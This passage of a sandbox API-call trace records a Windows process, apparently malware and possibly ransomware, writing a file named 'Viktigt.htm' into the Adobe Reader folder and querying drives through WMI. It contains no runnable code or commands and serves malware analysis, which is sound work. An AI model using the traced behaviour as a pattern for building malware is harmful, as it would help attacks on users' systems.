10.0\\Viktigt.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm", lpFilePart=0x0) returned 0x34 [0212.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0212.893] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0213.098] GetFileType (hFile=0x598) returned 0x1 [0213.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0213.098] GetFileType (hFile=0x598) returned 0x1 [0213.098] WriteFile (in: hFile=0x598, lpBuffer=0x3689dcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x3689dcc*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0213.099] CloseHandle (hObject=0x598) returned 1 [0213.099] CoTaskMemAlloc (cb=0x20c) returned 0x66cdfc8 [0213.099] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cdfc8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0213.100] CoTaskMemFree (pv=0x66cdfc8) [0213.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0213.100] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0213.100] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0213.100] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0213.100] IUnknown:Release (This=0xb51e34) returned 0x1 [0213.101] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6027360) returned 0x0 [0213.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027360, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0213.101] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027360, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6029e30) returned 0x0 [0213.101] WbemDefPath:IUnknown:Release (This=0x6027360) returned 0x0 [0213.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6029e30) returned 0x0 [0213.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0213.101] WbemDefPath:IUnknown:AddRef (This=0x6029e30) returned 0x3 [0213.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0213.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0213.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0x66ce4e8) returned 0x0 [0213.101] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce4e8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.101] WbemDefPath:IUnknown:Release (This=0x66ce4e8) returned 0x3 [0213.101] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0213.101] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0213.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0213.102] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x2 [0213.102] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x1 [0213.102] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0213.102] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0213.102] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6029e30) returned 0x0 [0213.102] WbemDefPath:IUnknown:AddRef (This=0x6029e30) returned 0x3 [0213.102] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x2 [0213.102] WbemDefPath:IWbemPath:SetText (This=0x6029e30, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0213.102] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0213.102] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0213.102] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0213.102] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029e30, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0213.102] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0213.102] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029e30, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0213.102] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029e30, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0213.102] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0213.102] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0213.102] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0213.102] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.102] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0213.102] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0213.102] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0213.102] IUnknown:Release (This=0xb51e34) returned 0x1 [0213.103] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6027400) returned 0x0 [0213.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027400, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0213.103] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027400, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6029dc0) returned 0x0 [0213.103] WbemDefPath:IUnknown:Release (This=0x6027400) returned 0x0 [0213.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6029dc0) returned 0x0 [0213.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0213.103] WbemDefPath:IUnknown:AddRef (This=0x6029dc0) returned 0x3 [0213.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0213.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0213.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbdf1b0) returned 0x0 [0213.104] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf1b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.104] WbemDefPath:IUnknown:Release (This=0xbdf1b0) returned 0x3 [0213.104] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0213.104] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0213.104] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0213.104] WbemDefPath:IUnknown:Release (This=0x6029dc0) returned 0x2 [0213.104] WbemDefPath:IUnknown:Release (This=0x6029dc0) returned 0x1 [0213.104] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0213.104] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0213.104] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6029dc0) returned 0x0 [0213.104] WbemDefPath:IUnknown:AddRef (This=0x6029dc0) returned 0x3 [0213.104] WbemDefPath:IUnknown:Release (This=0x6029dc0) returned 0x2 [0213.104] WbemDefPath:IWbemPath:SetText (This=0x6029dc0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0213.104] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029dc0, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0213.104] WbemDefPath:IWbemPath:GetText (in: This=0x6029dc0, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0213.104] WbemDefPath:IWbemPath:GetText (in: This=0x6029dc0, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.104] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0213.104] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0213.104] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0213.104] IUnknown:Release (This=0xb51e34) returned 0x1 [0213.105] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6023b10) returned 0x0 [0213.105] WbemLocator:IUnknown:QueryInterface (in: This=0x6023b10, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0213.105] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023b10, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6027410) returned 0x0 [0213.105] WbemLocator:IUnknown:Release (This=0x6023b10) returned 0x0 [0213.105] WbemLocator:IUnknown:QueryInterface (in: This=0x6027410, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6027410) returned 0x0 [0213.105] WbemLocator:IUnknown:QueryInterface (in: This=0x6027410, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0213.105] WbemLocator:IUnknown:AddRef (This=0x6027410) returned 0x3 [0213.105] WbemLocator:IUnknown:QueryInterface (in: This=0x6027410, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0213.105] WbemLocator:IUnknown:QueryInterface (in: This=0x6027410, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0213.105] WbemLocator:IUnknown:QueryInterface (in: This=0x6027410, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0213.105] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0213.105] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0213.105] WbemLocator:IUnknown:QueryInterface (in: This=0x6027410, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0213.105] WbemLocator:IUnknown:Release (This=0x6027410) returned 0x2 [0213.105] WbemLocator:IUnknown:Release (This=0x6027410) returned 0x1 [0213.105] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0213.106] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0213.106] WbemLocator:IUnknown:QueryInterface (in: This=0x6027410, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6027410) returned 0x0 [0213.106] WbemLocator:IUnknown:AddRef (This=0x6027410) returned 0x3 [0213.106] WbemLocator:IUnknown:Release (This=0x6027410) returned 0x2 [0213.106] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029dc0, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0213.106] WbemDefPath:IWbemPath:GetText (in: This=0x6029dc0, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0213.106] WbemDefPath:IWbemPath:GetText (in: This=0x6029dc0, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.106] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60273d0) returned 0x0 [0213.106] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60273d0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x60336e4) returned 0x0 [0213.721] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5bb84) returned 0x0 [0213.721] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bb84, pProxy=0x60336e4, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0213.721] WbemLocator:IUnknown:Release (This=0xb5bb84) returned 0x1 [0213.721] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5bba4) returned 0x0 [0213.721] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5bb84) returned 0x0 [0213.721] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bb84, pProxy=0x60336e4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0213.722] WbemLocator:IUnknown:Release (This=0xb5bb84) returned 0x2 [0213.722] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x1 [0213.722] CoTaskMemFree (pv=0xbd4a38) [0213.722] WbemLocator:IUnknown:Release (This=0x60273d0) returned 0x0 [0213.722] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5bba4) returned 0x0 [0213.723] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0213.723] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0213.723] WbemLocator:IUnknown:AddRef (This=0xb5bba4) returned 0x3 [0213.723] WbemLocator:IUnknown:QueryInterface (in: 